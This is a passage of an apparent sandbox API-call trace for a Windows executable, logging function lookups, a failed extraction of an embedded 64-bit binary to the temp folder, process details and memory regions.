lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5e\xb0\x91\x78\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.498] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0300.498] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0300.498] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.498] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0300.498] GetCurrentProcess () returned 0xffffffff [0300.498] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0300.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.498] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0300.498] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0300.498] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0300.499] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0300.499] LockResource (hResData=0x43c648) returned 0x43c648 [0300.499] GetCurrentPackageId () returned 0x3d54 [0300.499] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0300.882] GetLastError () returned 0x20 [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetLastError () returned 0x20 [0300.882] SetLastError (dwErrCode=0x20) [0300.882] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0300.978] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0301.047] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0301.047] ExitProcess (uExitCode=0x1) Thread: id = 1026 os_tid = 0x850 Process: id = "156" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x5c184000" os_pid = "0x544" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xeac" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10625 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10626 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10627 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10628 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10629 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10630 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10631 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10632 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10634 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10635 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10636 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10637 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10638 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10639 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10640 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10641 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10642 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10669 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10670 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10671 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10672 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10673 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10674 start_va = 0x2a0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10675 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10676 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10677 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10678 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10783 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10784 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10785 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10786 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10787 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10788 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10789 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10790 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10791 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10792 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10793 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10794 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10795 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10796 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10797 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10798 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10799 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10800 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10801 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10802 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10803 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10804 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10805 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10806 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10807 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10816 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10817 start_va = 0x580000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10818 start_va = 0x580000 end_va = 0x5a9fff entry_point = 0x580000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10819 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 10820 start_va = 0x660000 end_va = 0x7e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 10821 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10822 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10823 start_va = 0x7f0000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 10824 start_va = 0x980000 end_va = 0x1d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 10825 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10826 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10827 start_va = 0x1d80000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Thread: id = 1022 os_tid = 0x908 [0300.679] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0300.679] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0300.679] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0300.679] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0300.679] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0300.679] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0300.680] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0300.681] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0300.682] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0300.683] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0300.751] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0300.752] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0300.753] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0300.753] GetProcAddress (hModule=0x75130000, 